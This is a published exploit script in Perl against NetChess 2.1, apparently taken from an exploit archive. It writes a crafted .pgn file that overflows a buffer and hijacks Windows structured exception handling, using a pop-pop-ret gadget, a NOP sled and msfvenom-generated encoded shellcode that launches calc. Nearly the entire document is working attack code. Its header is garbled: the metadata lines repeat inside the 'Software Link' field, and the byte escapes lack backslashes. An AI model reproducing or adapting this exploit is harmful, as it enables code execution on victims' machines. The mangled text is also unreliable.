# Exploit Title: NetChess2.1 Buffer Overflow (SEH)
# Date: 8/1/2022
# Exploit Author: Ugur Eminli
# Vendor Homepage: https://sourceforge.net/projects/avmnetchess/
# Software Link: # Exploit Title: NetChess2.1 Buffer Overflow (SEH)
# Date: 8/1/2022
# Exploit Author: Ugur Eminli
# Vendor Homepage: https://sourceforge.net/projects/avmnetchess/
# Software Link: https://sourceforge.net/projects/avmnetchess/
# Version: 2.1
# Tested on: WinXP SP2 Build 2600

#!/usr/bin/perl

my $file= "exploit.pgn";
my $junk= "x41" x 336;

#JMP short 6bytes
my $seh="xebx06xccxcc";

#0x74d31567 : pop edi # pop esi # ret | {PAGE_EXECUTE_READ} [oledlg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.0 (C:WINDOWSsystem32oledlg.dll)
my $nseh= "x67x15xd3x74";

my $nop= "x90" x 10;

#bad chars: x00x0ax1ax2fx3bx3cx3fx25x28x21x22x23x24x5ex7bx2ex5bx5d

# msfvenom -p windows/exec cmd=calc -e x86/alpha_upper -a x86 --platform windows -f pl -b "x00x0ax1ax2fx3bx3cx3fx25x28x21x22x23x24x5ex7bx2ex5bx5d" EXITFUNC=seh

my $buf =
"x89xe7xd9xccxd9x77xf4x5fx57x59x49x49x49x49" .
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" .
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41" .
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42" .
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4d" .
"x38x4cx42x53x30x43x30x45x50x33x50x4cx49x4d" .
"x35x36x51x4fx30x35x34x4cx4bx56x30x30x30x4c" .
"x4bx56x32x44x4cx4cx4bx51x42x45x44x4cx4bx34" .
"x32x47x58x54x4fx4ex57x31x5ax57x56x36x51x4b" .
"x4fx4ex4cx47x4cx45x31x43x4cx44x42x56x4cx57" .
"x50x49x51x38x4fx44x4dx55x51x39x57x5ax42x5a" .
"x52x30x52x46x37x4cx4bx51x42x52x30x4cx4bx30" .
"x4ax57x4cx4cx4bx50x4cx34x51x53x48x4bx53x30" .
"x48x53x31x38x51x50x51x4cx4bx46x39x37x50x43" .
"x31x48x53x4cx4bx50x49x44x58x5ax43x47x4ax31" .
"x59x4cx4bx46x54x4cx4bx33x31x49x46x46x51x4b" .
"x4fx4ex4cx49x51x38x4fx44x4dx55x51x39x57x30" .
"x38x4bx50x44x35x4cx36x55x53x53x4dx4ax58x47" .
"x4bx53x4dx57x54x43x45x4ax44x50x58x4cx4bx46" .
"x38x31x34x45x51x59x43x43x56x4cx4bx44x4cx50" .
"x4bx4cx4bx46x38x45x4cx33x31x39x43x4cx4bx45" .
"x54x4cx4bx45x51x58x50x4dx59x37x34x31x34x51" .
"x34x51x4bx31x4bx45x31x31x49x30x5ax50x51x4b" .
"x4fx4bx50x51x4fx51x4fx51x4ax4cx4bx34x52x4a" .
"x4bx4cx4dx31x4dx53x5ax45x51x4cx4dx4cx45x4e" .
"x52x55x50x45x50x33x30x56x30x45x38x36x51x4c" .
"x4bx32x4fx4dx57x4bx4fx58x55x4fx4bx4bx4ex44" .
"x4ex37x42x4bx5ax42x48x59x36x4ax35x4fx4dx4d" .
"x4dx4bx4fx49x45x47x4cx53x36x33x4cx44x4ax4d" .
"x50x4bx4bx4bx50x32x55x43x35x4fx4bx47x37x54" .
"x53x54x32x52x4fx32x4ax33x30x51x43x4bx4fx58" .
"x55x33x53x43x51x42x4cx55x33x45x50x41x41";


open($FILE,">$file");
print $FILE "$junk$seh$nseh$nop$buf$nop";
close($FILE);
print " [+] Exploit File Created: $file ";